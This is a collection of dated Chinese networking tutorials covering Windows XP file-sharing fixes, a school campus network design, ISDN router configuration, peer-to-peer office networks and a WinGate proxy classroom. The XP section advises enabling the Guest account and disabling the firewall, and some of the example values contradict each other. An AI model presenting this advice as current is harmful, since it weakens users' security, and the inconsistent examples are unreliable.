网上邻居－>属性－>本地连接－>属性---->安装------>协议------->NetBEUI Protocol

10、起用Guest(来宾)账户
Windows XP的Guest账户允许其他人使用你的电脑，但不允许他们访问特定的文件，也不允许他们安装软件。对Windows XP Home Edition计算机或工作组中的Windows XP Professional计算机的所有网络访问都使用来宾账户。使用net user guest确保为网络访问设置了来宾账户，如果该账户是活动的，命令输出中会出现一行类似下面这样的内容：Account active Yes；如果该账户不是活动的，请使用下面的命令授予来宾账户网络访问：
net user guest /active:yes

或者打开控制面板－>用户账户或者在管理工具－>计算机管理－>本地用户和组中打开Guest账户

11、允许Guest(来宾)账号从网络上访问
在运行里输入gpedit.msc，弹出组策略管理器，在‘计算机配置-Windows设置-本地策略-用户权利指派’中，有“拒绝从网络访问这台计算机”策略阻止从网络访问这台计算机，如果其中有GUEST账号,解决办法是删除拒绝访问中的GUEST账号。

12、防火墙
确保WINXP自带的防火墙没有开启，打开本地连接属性－>高级，关掉Internet连接防火墙。如果使用了第三方的防火墙产品，参考其使用手册，确保防火墙没有禁止以下端口的通讯：UDP－137、UDP－138、TCP－139、TCP－445（仅WIN2K及以后的操作系统）。 Windows XP最新的SP2补丁对ICF做了很大的改进，功能更强大了，ICF有了自己的设置项，安装SP2后，默认情况下，启用ICF防火墙，不允许任何外部主动连接，即使是本地的应用程序要访问网络也需要在许可列表中做设置。
但是防火墙阻断正常的网络浏览服务通讯，结果是别人在网上邻居中看不到你的计算机，有没有两全其美的办法在开启防火墙的前提下允许浏览服务。办法是，如果开启了ICF，打开属性，在服务这栏，选择添加，添加服务的对话框共有四个编辑框，最上边是描述服务名称，以便于记忆，从上到下第二个是应用服务的IP地址或名称，输入127.0.0.1表示本机。下面几个是内外端口号，旁边的tcp/udp表示这个端口是udp连接还是tcp连接。按照下面的表格输入3个服务

名称 协议 端口
NetBIOS Name Service UDP 137
NetBIOS Datagram Service UDP 138
NetBIOS Session Service TCP 139

137/UDP -- NetBIOS名称服务器,网络基本输入/输出系统(NetBIOS)名称服务器(NBNS)协议是TCP/IP上的NetBIOS (NetBT)协议族的一部分，它在基于NetBIOS名称访问的网络上提供主机名和地址映射方法。
138/UDP -- NetBIOS数据报,NetBIOS数据报是TCP/IP上的NetBIOS (NetBT)协议族的一部分，它用于网络登录和浏览。
139/TCP -- NetBIOS会话服务,NetBIOS会话服务是TCP/IP上的NetBIOS (NetBT)协议族的一部分，它用于服务器消息块(SMB)、文件共享和打印。

13、检查RPC、Plug and Play服务已启动
检查相应的系统文件夹的权限，重新注册以下的动态链接库：
regsvr32 netshell.dll
regsvr32 netcfgx.dll
regsvr32 netman.dll

14、设置帐号和密码
由于WinNT内核的操作系统，在访问远程计算机的时候，好像总是首先尝试用本地的当前用户名和密码来尝试，可能造成无法访问，在这里把用户密码添加进去就可以了。

15、多种方法访问“网络计算机”
例如要打开网络中名为“Killer”的计算机，其IP地址为192.168.1.8，如果你不清楚其它机器的IP地址，你可以使用“PING计算机名”来获得它的IP地址。用计算机名访问，NETBIOS提供的服务。点击“开始”菜单，单击“运行”，在地址栏输入“\Killer”，单击“确定”。用IP地址访问，在地址输入栏中输入“\192.168.1.8”，单击“确定”。
用搜索计算机的方法访问，计算机更新列表需要时间，搜索计算机可以加快更新列表。点击“网上邻居”右键中的“搜索计算机”，输入计算机名，点击“立即搜索”，就可以看到你要访问的计算机。直接双击右边计算机名就可以打开它了。用映射驱动器的方法访问，进入DOS方式，输入“NET VIEW \killer”，回车这是查看计算机Killer上有哪些共享文件夹，如D。再输入NET USE Z:\Killer\D将计算机IBM-ZB共享的文件夹D映射为H：盘，在命令提示符下键入“Z:”。你会发现你已经连到Killer计算机上了。


昆明实验小学 千兆校园网设计方案

《一键清理系统垃圾》

昆明实验小学 千兆校园网设计方案

      校园计算机网络已成为学校办学的基础设施和必备条件。中国华育发展总公司是国家教育部直属的、以开发教育软件和网络集成为主、推进教育教学信息化和现代化为主要经营方向的综合型企业。
    经过广泛的市场调研，针对中等学校办学特点和应用需求，中国华育潜心研究，开发出“中等学校千兆校园网整体解决方案”。该方案以千兆主干网络为基础平台，以校园网应用为主线，以实现广泛的教育资源共享、提高教育教学的现代化水平为目的，为建设信息化学校提供了一个完整的解决方案。

    针对不同类型的学校，中国华育开发出了中国职业教育校园网集成系统CVES、中国基础教育校园网集成系统CFES。整个学校的办公自动化、教育管理、图书馆管理、多媒体教学及远程教育可以一网解决。在华育的解决方案中，考虑到校园网在现代教育技术中的基础作用，以校园网的应用为核心，充分发挥校园网作为学校教育的新的平台作用。

    做为一个典型的案例，昆明春城实验小学千兆校园网的建设，可以充分展示华育的校园网解决方案是如何帮助学校运用现代教育技术，进行现代化的教学的。其中包括学校对信息化建设的要求，以及在网络技术上是如何实现的。

    昆明春城实验小学千兆校园网全面解决方案，由中国华育发展总公司信息工程事业部负责设计与实施，于2000年6月开始，2000年8月完成。这是一个整体规划、分步实施、充分考虑现有设备与实际资金情况的方案。第一步，先建立网络中心和主干网，然后建立学校的信息管理网络、教学网络、图书管理网络和电子阅览室各应用子系统，并进行教学楼、办公楼、图书馆的结构化布线，将网络扩展到整个校园。第二步，在所有的教室安放计算机和电视机，进行多媒体教学，实现校园网的全部功能，最后通过路由器与CERNET和Internet接入。该方案充分考虑到学校的应用和资金情况，具有较高的科学性和参考价值。

    ■校园网建设核心

    在设计过程中，设计者充分考虑到教育管理和多媒体教学的要求，并且网络技术上应该具有一定的先进性，同时还要为以后的扩展留有一定的空间。为此校园网应该能达到以下要求：

    ● 网络具有传递语音、图形、图像等多种信息媒体功能，具备性能优越的资源共享功能；

    ● 校园网中各终端间具有快速交换功能；

    ● 中心系统交换机采用虚拟网技术，对网络用户具有分类控制功能；

    ● 对网络资源的访问提供完善的权限控制；

    ● 网络具有防止及便于捕杀病毒功能，以保证网络使用安全；

    ● 校园网与Internet网相连后，应具有“防火墙”过滤功能，以防止网络黑客入侵网络系统；

    ● 可对接入因特网的各网络用户进行权限控制。

    ■校园网硬件设计

    1 校园网主干网络

    在昆明春城实验小学千兆校园网方案中，采用基于第三层交换的千兆以太网作为校园网主干。

    在本方案中，主干交换机采用Lucent公司Cajun P550交换机。它属于第三层千兆以太网路由交换机，内部集成路由功能，具备高容量、无阻塞、优质的管理能力和可靠的多媒体支持等特点。将千兆以太网交换、快速以太网交换、以太网交换以及路由都集成到一个交换机中，使得交换机的功能十分强大。

    节点交换机和主干交换机之间通过千兆光纤连接。

    教学楼采用Cajun P330交换机作节点交换机，实验楼采用Cajun P120交换机作节点交换机，组成快速以太工作组网。

    2 网络服务器

    网络服务器包括文件服务器、Internet服务器、网管工作站，以及面向全校使用的小型机等。

    服务器根据学校的要求分别选择了Toshiba Magnia 5100和3010服务器。

    3 干线光纤

    在校园网中，此次需敷设二条主干光缆，采用的是多芯室内铠装多模光缆，分别敷设在科研楼到教学楼和科研楼到实验楼。

    4 结构化综合布线

    本方案中，我们采用Lucent Technologies 的Systimax SCS综合布线产品。

    依据结构化布线原则，本着达到布局美观的效果，楼宇间的布线采用光纤，各楼层的布线走PVC管或在天花板内走线，并在结构化布线系统中的信息插座留有一定的冗余度，以确保日后终端设备位置调整和网络扩展的需要。

    5 广域网互联和网络安全

    广域互联也是本设计的重点，本方案中使用PortMaster2R通过一条DDN专线，将校园网接入中国教育科研网CERNET， 从而进入国际互联网Internet。

    为保证网络安全，防止黑客非法侵入网络，网络必须提供IP防火墙，PortMaster2R，内置防火墙，可有效地保证网络的安全。

    6 应用子网及网络互连

    春城实验小学校园网除网络主干外，还拥有教育管理子网、图书馆管理子网、电子阅览室子网、计算中心子网等。

    对于已有的子网只需要通过节点交换机的10M/100M以太网接口与该子网的集线器或交换机相连即可。

    7 网络管理及系统软件

    本方案全部采用智能网络设备,并通过网络管理协议传送给管理设备。本方案采用Lucent基于Windows NT平台的Cajun View软件，通过网络管理工作站，对整个网络的智能设备进行有效的图形管理。

    本方案使用的系统软件如下：

    网络平台：Windows NT Server 4.0中文版，工作站端用Pwin98；

    数据库开发平台：Microsoft SQL Server 7.0；

    邮件通讯软件：Microsoft Exchange Server 5.5；

    应用软件包括：

    多媒体视频广播软件：HYcast

    多媒体教学及课件制作软件：HYmedia

    多媒体视频点播软件：HYVOD

    ■校园网应用

    1 校园网管理信息系统

    中国基础教育校园网集成系统CFES面向全校，覆盖教育行政管理、图书馆管理、后勤管理和互联网连接等领域，分为教学管理、学生管理、行政管理、通用服务、互联网络和图书馆管理等分系统，以及教务管理、教师管理、教材管理、设备管理、学籍管理、考绩管理、人事管理、文书管理、综合查询、通用查询、电子邮件、远程登录、图书编目、图书流通、图书检索和馆长查询等近七十个管理子系统。

    CFES集管理、教学和科研为一体，是中等专业学校信息化的全面解决方案。CFES软件采用了新的开发平台（ASP）和数据库平台（SQL Server），软件设计采用了C/S和B/S结构。系统运行平台为中文Windows，软件风格统一的可视化图形界面，丰富的联机帮助，操作简便，使操作人员轻松上手。

    2 校园网计算机教学系统

    计算机教学系统主要包括多媒体网络教室、多媒体视频点播、多媒体视频广播系统。春城实验小学做为一所云南省重点小学，在教学思想和教学手段上都有其独到之处。针对其具体情况，华育为学校设计了一个能够充分实现学校先进教育思想的一个现代化的教学平台，该方案实现了多媒体网络教学功能。它采用华育自有的多媒体教学软件，即华育多媒体视频点播系统和多媒体视频广播系统。充分利用校园网高带宽的优势，在计算机数据网络中实现了校园闭路电视的全部功能，可以对观摩教室进行现场直播，为现代化教学提供了一个新的平台。

    3 校园网站

    校园网不是一个独立的、封闭的体系，校园网与Internet互连后，校园网用户在权限允许的范围内可以使用Internet上的Web访问、Email收发、FTP、Telnet、BBS、新闻组、讨论组、个人主页等服务。

    校园网站连接Internet，用于宣传学校形象、教学信息发布、提供信息查询等，以后可成为网上教学的渠道。网站主页的设计，主要由老师创意，学生制作，体现学生的创造性，培养学生的动手能力。

    ■方案特点

    综合网络技术的发展,并在对学校的需求进行了详细的分析之后，证明昆明春城实验小学的校园网方案具有先进性、可扩展性、开放性、安全性、可管理性和丰富的应用等特点。它不仅是中国华育发展总公司开展教育信息工程的成功案例，而且学校也已成为云南省信息化学校的一个样板工程。

    昆明实验小学千兆校园网设计方案

返回


利用ISDN构造广域网

《一键清理系统垃圾》

利用ISDN构造广域网

随着企业信息化程度的提高，企业越来越需要建立广域网络连接，特别是需要一种稳定廉价实用的广域网连接。目前, 可以作为广域网线路通信服务的方式很多,主要有DDN、Frame Relay、X.25、ISDN、ADSL等多种方式。然而,一方面 DDN、Frame Relay、X.25的价格对小企业来说,还是比较高;另一方面,现在仅有很少的一些城市能够提供ADSL服务。因此，ISDN受到越来越多网络建设人员的青睐，尤其在不需要24小时保持连接的中小型企业，ISDN具有明显的优势。

ISDN的接口有BRI和PRI两种形式。基于价格的原因，我们主要推荐和讨论的是BRI（基本速率接口）。BRI服务提供了2个B信道和1个D信道（2B＋D）。BRI的B信道速率为64kbps，用于传输用户数据；D信道的速率为16kbps，一般用于传输控制信息和信号信息。因此BRI的实用用户数据带宽为128kbps。

ISDN网络构成

ISDN网络由一系列ISDN组件构成，包括终端、终端适配器（TA）、网络终端设备、线路终端设备和交换终端设备。作为用户主要关心的是终端和终端适配器。ISDN的终端分为两类，专用的ISDN终端称为第一类终端设备（TE1）；在ISDN标准出现之前就存在的非ISDN终端（如DTE）称为第二类终端设备（TE2）。TE1通过4芯双绞线数字电缆连接到ISDN网络上，TE2通过TA连接到ISDN网络上。

除了TE1和TE2设备之外，ISDN网络中还有第一类网络终端设备（NT1）和第二类网络终端设备（NT2），这些网络终端设备将四芯的用户线连接到传统的两芯本地环路上。

ISDN网络中还指定了许多参考点，用于组件间的逻辑接口，主要有：

R：非ISDN设备(TE2)与TA之间的参考点；

S：用户终端(TE1)与TA之间的参考点；

T：NT1与NT2之间的参考点；

U：NT1与本地网络终端间的参考点；

V：本地网络终端与交换网络终端间的参考点。

ISDN设备选型

目前能够支持ISDN的网络设备有很多，笔者推荐采用Cisco 2610作为企业总公司接入路由器，分支机构采用Cisco 1603作为分支路由器。

Cisco 2610具有一个以太网端口，两个WAN卡插槽和一个网络模块插槽，是Cisco 2600系列比较低档的路由器。每个WAN卡插槽可以插一个单BRI接口的WAN卡，网络模块插槽可以插一块8个BRI口的模块，所以Cisco 2610最多支持10个BRI的接入。Cisco 2610支持的WAN卡有两种：WIC－1B－S/T和WIC－1B－U，这两种卡均有一个BRI口，不同的是后一种带有NT1。

Cisco 1603具有一个以太网端口、一个BRI接口和一个WAN接口卡插槽。属于Cisco支持ISDN的最低档路由器。

图1 通过PSDN建立广域网

ISDN安装设置

1.设备安装方法

一般来讲电话局应该负责NT1设备的安装，为了方便移动，自己掌握NT1的安装也是必要的。另外，Cisco 2610也具有直接带有U端的BRI模块，这种直接带有U端的BRI接口本身含有NT1接口，可以直接接到用户线上。一般电话局会要求此类设备有入网证，否则要进行检测，合格后方能入网。

NT1设备一般有电源、U接口和S接口。北京地区电话局提供的NT1设备可以不接电源而由远端供电。U接口就是U参考点定义的接口，用于连接本地环路，就是到电话局的那对实线，采用RJ11接口，使用RJ11头的中间两芯，且无极性。ISDN的电话局本地环路实线电压比较高，大约96V，注意避免短接或裸手接触。S接口采用RJ45接口，用于连接路由器。

NT1到路由器的连接可以简单地采用普通五类双绞线跳线就可以了。一端接在NT1的S端，一端接在路由器的BRI口（如BRI0）。路由器的Ethernet口接到局域网。

2. 路由器设置方法

ISDN的路由器设置主要包括选定ISDN交换机类型、确定连接触发条件、选定端口及数据封装格式，如果需要的话确定SPID（此项设置与ISDN交换机类型有关，在北京地区不需要）。

ISDN的交换机类型用 isdn switch－type 命令设置，北京地区可以设定为vn2。

确定连接触发条件时用以下命令定义：Dialer－list、Dialer－group、Dialer map。Dialer－list定义一个全局的基于协议的拨号表；Dialer－group在某个端口指定这个拨号表；Dialer map 定义路由。

数据封装格式有PPP或HDLC，缺省是HDLC。

3. 设置实例

假设router1所在端ISDN号码是80000001，router2所在端ISDN号码是80000002。

(1)router1设置：

version 11.0

service udp－small－servers

service tcp－small－servers

hostname router1

;定义路由器名

isdn switch－type vn2

；定义ISDN交换机类型

interface Ethernet0

ip address 192.168.100.222 255.255.255.0 ；定义局域网口IP地址

interface BRI0

；ISDN接口

ip address 192.168.201.202 255.255.255.0

；定义此接口的IP地址

dialer idle－timeout 300

；持续300秒没有包通过则断掉连接（可以省钱）

dialer wait－for－carrier－time 15

；拨号前等待载波

dialer map ip 192.168.201.201 88888882

；定义路由，192.168.201.201是远程路由器与本端口相连接的端口的IP地址，请参考router2 BRI0的IP地址。88888882是远程ISDN的号码，请用实际号码替代。

dialer－group 1

；采用dialer－list 1定义的触发条件

dialer－list 1 protocol ip permit

；如果有IP包要求通过则触发。

ip route 192.168.101.0 255.255.255.0 192.168.201.201

；定义静态路由，防止路由表更新。

end

(2)router2设置基本同router1：

version 11.0

service udp－small－servers

service tcp－small－servers

hostname router2

isdn switch－type vn2

interface Ethernet0

ip address 192.168.101.221 255.255.255.0

interface BRI0

ip address 192.168.201.201 255.255.255.0

dialer idle－timeout 300

dialer wait－for－carrier－time 15

dialer map ip 192.168.201.202 80000001

dialer－group 1

dialer－list 1 protocol ip permit

ip route 192.168.100.0 255.255.255.0 192.168.201.202

end

返回


利用Windows for Workgroups3.11和Windows95组建办公网

《一键清理系统垃圾》

利用Windows for Workgroups3.11和Windows95组建办公网

        该文与利用Netware 3.12和Windows95组建办公网的“四世同堂办公网”一文在功能上互为补充、各有特色，希望能对广大读者有所裨益。
    目前许多单位微机的档次和性能参差不齐，多数由386、486和Pentium组成。怎样将这些机器全部利用起来，不使一些“过时”的机器被无情地“抛弃”掉？最好的方案是建立一个网络，实现资源的共享。本文介绍如何利用Windows for Workgroups3.11和Windows95组建一个经济型多功能的办公局域网。
    一、网络的规划和硬件的安装
    网络选用对等式（Peer－to－Peer）结构，网卡采用普通ISA总线的16位NE2000以太网兼容卡，此类网卡比较便宜（市面上仅售60元左右）。网络连线使用细同轴电缆线，每段同轴电缆线的两端装有BNC连接头，相邻两段同轴电缆以专用的T型头连接，T型头的一端接入网卡的BNC头，最后还需在整个网段的两端各装上一个50欧姆的终端电阻。
    此网组建简单、成本低，并易于管理，不需要专用的网络服务器。不但每台机器（包括低档的386机型）上的资源可与其他机器共享，而且每个用户可以共享网络上的高质量打印机和CD－ROM。需要注意的是：386和较早的486机型不具备即插即用（PnP）功能，因而在这些机器上安装网卡前一定要进行中断IRQ和I/O地址的设置，以防止与其他设备发生冲突。设置工作可由网卡驱动程序盘中附带的Setup程序来完成。如果你的机器具有PnP功能，那么目前市面上大量出售的无跳线网卡是不必进行上述设置的。
    二、软件的安装
    安装和运行Windows95时，计算机至少应具有8M RAM、80M硬盘空间；而Windows for Workgroups3.11是基于Windows点对点间的网络操作系统，与Windows3.x相比，它增加了文件及打印共享、电子邮件、事件调度等网络功能。并且Windows for Workgroups3.11对硬件的要求也低，只要是具有4M RAM、20M硬盘空间的386以上的兼容机就可顺利地安装并运行。为此，可在较高配置的486机和Pentium机上安装Windows95，其他低性能的机器全部安装Windows for Workgroups3.11。
    1.Windows95下网卡的安装和设置
    当按照正常方法安装完成中文Windows95后，需进行以下三项工作：
    （1）安装网卡驱动程序　进入“控制面板”，选择“网络”选项，单击“添加”后再选择“适配器”，并点击旁边的“添加”按钮，出现“选定网络适配器”的窗口，这时如果你十分清楚网卡的生产商及类型，便可在窗口的“厂商”下方列表中选择网卡的生产厂商，并在“网络适配器”下方列表中选择网卡对应的型号；如果你不能确定网卡的生产厂家和类型或列表中没有与你的网卡相对应的选项时，可选择“从磁盘安装”，系统要求你插入网卡的驱动程序盘，所需的网卡信息全部位于网卡附带驱动程序盘的Windows95目录下。之后按“确定”，返回“选定网络组件类型”窗口；
    （2）选择网络协议　接着选取“协议”并单击“添加”，出现“选定网络协议”的窗口，选择左边“厂商”下的“Microsoft”后，再选择右边“网络协议”下方的“NETBEUI”选项（当你不确定时也可以全选，其他多选的协议并不会影响系统正常的工作），按“确定”返回“网络”窗口；
    （3）标识计算机　在“网络”窗口中选择“标识”选项，在“计算机名称”后输入在网络中识别这台计算机的名字，在“工作组”后输入该机所属于的工作组名（可输入Workgroup，因为Windows for Workgroups3.11在安装中自动生成的工作组名为Workgroup），如需要也可在“计算机描述”后输入描述本台计算机的说明。
    2.安装并设置Windows for Workgroups3.11
    （1）安装Windows for Workgroups3.11　安装Windows for Workgroups3.11之前，必须先安装Windows3.x或在WW3.10上升级，且安装中文Windows for Workgroups3.11时原系统必须为中文版本，安装英文Windows for Workgroups3.11时原系统也必须为英文版本。本文是在先装有英文Windows3.1的基础上安装Windows for Workgroups 3.11。具体的安装步骤和过程与单独安装Windows3.x时基本相同，一切按系统默认方式进行，安装完成并启动进入后，你会发现Windows for Workgroups3.11的界面与Windows3.x的相同，只是多了一个名为网络“NetWork”的程序组。Windows for Workgroups3.11网络功能的实现就是靠这个程序组来完成的。为了方便操作和电子邮件等信息的发送及接收，在Windows for Workgroups3.11上安装了Richwin4.21汉字系统，每次启动Windows for Workgroups3.11后再运行Richwin4.21，同时它还可以将部分英文提示汉化。
    （2）设置Windows for Workgroups3.11的网络功能　打开“NetWork”程序组，双击程序组下的“Network Setup”图标，出现如图1所示的“Network Setup”窗口。先选择“Network”选项，在新出现的窗口中选择安装微软网络“Install Microsoft Windows Network”一项，同时选择下方的“No additional network”一项，按“确定”返回到图1的窗口。再选择“Sharing”功能项，将“I want to be able to give others access to my s”和“I want to be able to allow other to print to my printer(s)”两项全部选取，这样这台机器上的文件和打印机就可以被网上的其他用户共享。按“确定”再返回窗口2。最后选择窗口下的“驱动程序”项，在弹出的窗口下选取“Add Adapter”安装网卡（最好选择从磁盘安装），并设置网卡的I/O和IRQ参数。当这两个参数有错时，系统会自动提示你进行改正，至无冲突后按“确定”返回上层菜单；再选择“Add Protocol”安装网络协议，在弹出窗口中选择“MS NETBEUI”协议，连续按三次“确定”后，安装结束。重新启动计算机后，系统要求输入登录名和口令，并对口令进行确认。当登录成功后就可以进行共享资源的设置了。
    三、设置网络资源的共享
    当上面工作结束后，重新启动计算机并进行登录，对机器上的有关资源进行共享功能的设置。
    1.Windows95下资源共享的设置
    在Windows95下设置资源共享是非常容易的。先打开“Windows资源管理器”，用鼠标点击需要共享的文件夹或设备名，按鼠标右键，选择“共享”。在弹出窗口的“共享”一栏下选取“共享为”一项，并输入共享名。接着点击“添加”功能项，添加可访问该资源的网上用户名，同时给每一用户提供了只读、完全访问和自定义三种访问方式，根据需要可选择一到三项。如果选了“自定义”访问方式，则可以设置密码，网上用户在访问这些资源时要输入密码才能进行。
    2.设置Windows for Workgroups3.11资源的共享
    选择“主群组”下的“文件管理器”，并选择需要被共享的资源，如目录、整个硬盘或CD－ROM等。假如选择了整个硬盘C之后，可点击“磁盘”菜单下的共享为“Share As”选项，在出现的“Share Directory”窗口下，输入有关的共享名，以后网络上的计算机就可以看到这个名字并共享其资源，当然也提供了三种不同的可供访问的方式（和Windows95相似）。按“确定”设置结束。同时也可将这台机器上的打印机与网络用户共享，方法为：选择“主群组”下的打印管理图标“Print Manager”，在弹出窗口中选择“打印机”菜单并点取“Share Printer As”，在又弹出窗口的“Share As”处输入打印机的共享名，如需要也可在“Password”后输入口令，让使用者根据口令确认能否使用打印机。按“确定”后，本地打印机就被设置成网络打印了。
    四、访问网上其他计算机用户的资源
    当装有Windows95的用户访问网上其他用户的资源时，可双击屏幕上的“网上邻居”图标，凡是与该机器相连的所有网上的用户名将全部呈现出来。选择你需访问的用户名后，将显示该用户开放给你的目录或设备名，这时你便可以像使用本地文件或设备一样来使用这些网上资源了。在Windows for Workgroups3.11的机器上访问网上资源时，先打开“文件管理器”，选择“磁盘”菜单下的“连接网络驱动器”，在弹出窗口的“驱动器”后任选一个逻辑驱动器名（系统默认为E），在“路径”后输入要访问的用户所在网上的路径（如：\\WQ），这时所选用户（WQ）上的共享目录和设备名将全部显示到“Shared Directories”列表下。同样可以像使用本地文件或设备一样来使用这些资源了。

返回


利用代理服务器建立网上教室

《一键清理系统垃圾》

利用代理服务器建立网上教室

    《建个经济实用的上网教室》一文，为经济型网上教室的建造提供了一个良好的解决方案。但在实际应用过程中，随着需要访问的网站及其连接的增多，采用离线浏览器将所有网站及其连接全部下载的方式既不经济、也无必要。下面这篇文章通过利用代理服务器的Cache（高速缓存）功能，巧妙地实现了离线浏览与在线浏览之间的合理衔接，建立起一个更高效、更完善的网上教室。
    一、设计思想
    通过代理服务器上网可以提高上网速度，这是因为代理服务器把客户访问过的内容存储在Cache（高速缓存）中，当下次需要浏览这些内容时，代理服务器就会自动从Cache中读取，从而加快了速度。根据代理服务器的这一功能，我们可以利用代理服务器软件（WinGate、MS－Proxy等）组建局域网上的代理服务器，工作站通过该代理服务器上网。这样既实现了整个局域网共享一个Modem、一条电话线上网，同时又把各工作站访问过的内容存储在代理服务器的Cache中，为局域网上的工作站所共享。当用户访问网站及其连接时，代理服务器首先在Cache中搜索它的内容，若有所需的就从Cache中读取，若没有就自动通过Modem访问该网站及其连接，这样就解决了离线浏览和在线浏览的衔接问题。在网上教学活动中，随着教学的开展，学生不断增多，访问过的网站及其连接也越来越多，Cache的容量不断增大，越来越多的网页内容可以从Cache中读取，通过Modem传输的数据相应减少，整个网络的速度也随之不断提高。
    二、实现过程
    1.安装代理服务器
    常见的代理服务器软件主要有WinGate、MSProxy等，这些软件可以实现代理服务器的各种功能，包括Cache(高速缓存)、共享Modem、防火墙、系统审计等。需要指出的是：《建个经济实用的上网教室》中所使用的SyGate虽然能够实现Modem的共享，但它并不是代理服务器软件，而是一个网关类软件。我们采用了使用得最为广范的WinGate2.1d，下面为大家介绍WinGate的安装过程。
    WinGate有ForWin95和ForWindowsNT两种版本，分别用于Win95对等网和WindowsNT局域网，两者的安装和设置基本相同，这里以Win95对等网为例进行说明。在安装WinGate之前请确认两件事：1作为服务器的那台电脑可以正常连接Internet；2Win95对等网已能正常工作，所有工作站均能连上服务器。
    （1）安装与设置服务器
    在服务器上运行WinGate安装程序，当提示输入SMTPServer、NEWServer等数据时请输入你的ISP所提供的数据，但不要改变默认的端口数值。其他设置选择默认值即可。安装完成后，WinGate会被作为一项服务来运行，也就是说每次启动Win95时WinGate就已经自动启动了。
    接着进行服务器的TCP/IP设置，按顺序选择：控制面版→网络→TCP/IP→属性，在IP地址选项中选择“指定IP地址”，IP地址值：192.168.0.1，子网掩码：255.255.255.0；在DNS项中选择“启用DNS”，主机名中填入这台服务器的名称（自定一个），域名可不填，“DNS服务器搜索顺序”中可填入你的ISP所提供的DNS服务器地址（可填多个，能提高速度），如果不知道也可以不填；重新启动计算机，服务器的安装和设置就确定了。
    （2）设置工作站
    各工作站无需安装WinGate，只要设置TCP/IP即可。同服务器一样，打开TCP/IP属性设定，IP地址值：192.168.0.X（X=2、3、4……各工作站的IP地址不能相同），子网掩码：255.255.255.0；在DNS项中选择“启用DNS”，主机名中填入这台工作站的名称（自定，但各工作站的名称不能相同），域名不填，“DNS服务器搜索顺序”中填入192.168.0.1（即服务器的IP地址）；重新启动计算机。
    （3）测试
完成以上设置后，在各工作站上进入MS－DOS方式，输入：Ping192.168.0.1，如果出现“replyfrom”的提示，证明与服务器连接成功，如出现“requesttimeout”的提示，则说明有问题，需再检查设置。
    （4）设置工作站上的Internet应用软件浏览器的设置：这里以IE4.0为例，其他浏览器可参照设置。进入IE4.0，按顺序选择：查看→Internet选项→连接，选择“通过局域网连接到Internet”、“通过代理服务器访问Internet”，在地址中填入192.168.0.1，端口：80；进入“高级”选项，选择“对所有协议均选用相同的代理服务器”。(图1)E－mail软件的设置：这里以Outlook为例进行说明。进入Outlook，按顺序选择：工具→账号→默认邮件账号→服务器，在SMTP和POP3服务器地址栏上均填上192.168.0.1，“账号名”中填入ISP提供给你的完整账号，但要用“＃”号代替“@”，例如填入abcd＃public.glptt.gx.cn，“密码”栏填入这一账号的密码。再转到“连接”设置，选择“使用局域网(LAN)连接”，最后选择“确定”。
    （5）上网测试
完成了以上所有设置后就可以上网测试了，在服务器上拨号上网，然后在各工作站上打开浏览器，随便连接一个站点，看看能否成功，如果不成功请仔细检查各项设置，直至所有工作站均能上网为止。
    （6）设置WinGate
    到了这一步，上网教室已经可以运作了，但为了优化其性能，还要对WinGate进行一些设置。WinGate的所有设置均可通过它所提供的管理程序GateKeeper来实现。进入GateKeeper，双击右边窗口中的“Caching”项，进入Cache设置窗口(图2)，

在“Limitcachesize”项中填入理想的设定值，这要根据服务器硬盘的大小来定，总之尽量选大的，我们使用一个6.3G的硬盘，把Cache最大值设为4G；从图1中还可以看到有两个“Numberofdaysbeforerechecking”选项，是指将Cache的更新周期，即Cache中的内容经过指定的天数后，若再次访问到这一内容时，WinGate会将它与网上的内容作比较，如果此内容已更新就重新下传。第一个选项是设定HTML文件的更新周期，默认值为2天，第二个选项是其他文件的更新周期，默认值为60天。为了提高速度，并考虑到教学网的特殊性（对内容的更新要求不高），我们把第一个选项设为30天，如果遇到如报刊类等经常更新的网站及其连接，可让学生利用浏览器的“刷新”功能来浏览新的内容。WinGate的功能十分强大，其对应的设置也很多，但对本网影响较大的主要还是Cache的设置，其他设置这里就不赘述了。
    2.安装和设置离线浏览器
    离线浏览器选择TeleportPro1.29，该软件的安装和使用方法请参考《建个经济实用的上网教室》一文，有所不同的是：本文中运行TeleportPro的是工作站而不是服务器，所以还要作相应的设置，步骤如下：进入TeleportPro，选择“File”菜单中的“ProxyServer”（图3），

在“connecttotheinternetthroughthisproxyserver”前打勾；在“Address”项中填入192.168.0.1，“Port”中填入80，最后选择“OK”，这样TeleportPro就可以通过代理服务器下载网站及其连接了。网上教室刚开始运作的时候，在任意一台（或几台）工作站上利用TeleportPro下载一些热门的站点，以便这些网站及其连接在服务器的Cache里留下踪迹，至于下载到工作站上的内容是否需要保存，那就视实际情况而定。
    3.制作主页
    制作主页的思路与《建个经济实用的上网教室》一文中介绍的是一致的，都是把已经下载的和经常访问的网站及其连接集成在自制的主页上进行导航，具体方法可参看该文。所不同的是，主页上的连接所指向的不是硬盘上的文件，而是该网站及其连接的真实Internet地址。
    三、需要注意的一些问题
    由于大量的信息传送都是在局域网内进行的，因此局域网的传输速度对上网教室的整体性能起了决定作用，所以如果条件许可，应尽量选用100Mbps快速以太网。同时服务器的性能也很重要，特别是在Cache设置得很大的时候，对服务器的要求就更高，应当尽量选择一台高性能的服务器，资金允许的话可采用SCIS硬盘，以提高速度。
    另外，本文以Win95对等网为例，主要是为了易于说明，在实际使用中，我们是采用WindowsNT局域网的。在WinGate的帮助文档中有提示：如果Cache中的文件数大于10000个，要想取得较快的速度，应当采用WindowsNT服务器。WinGateforWindowsNT的设置与ForWin95的大致相同，读者可参照进行。
    至此，一个经济、高效的网上教室就建成了。

返回


利用卫星接入Internet的技术方案

《一键清理系统垃圾》

利用卫星接入Internet的技术方案

    针对一般Internet应用上、下载之间信息量不对称，而下载速率又非常低的现状，我们设计了天地信息环网，通过采用卫星下载以最低的成本解决了现阶段地面网下载速率低这个通信瓶颈。
天地信息环网是由卫星网络、Intranet和Internet构成的环网，卫星网络、Intranet和Internet通过路由器联接在一起。位于各地的远端节点通过电话拨号方式连接Internet，登录到服务提供商的Web站点上，进行信息查询或电子商务活动。当远端节点下载信息时，下载信息通过卫星网络进行卫星广播，会员节点可通过一个卫星接收卡快速下载所需数据。

以下将针对卫星网络、Intranet、Internet三部分详细介绍。

图1 系统示意图

■卫星网络

1.VSAT网络系统描述

VSAT网络主要由网络主站和大量远端小站组成。

网络主站主要由以下三部分组成：

1)网络管理系统NMS；

2)主站传输服务器HTS(基于Windows NT平台)；

3)卫星调制器。

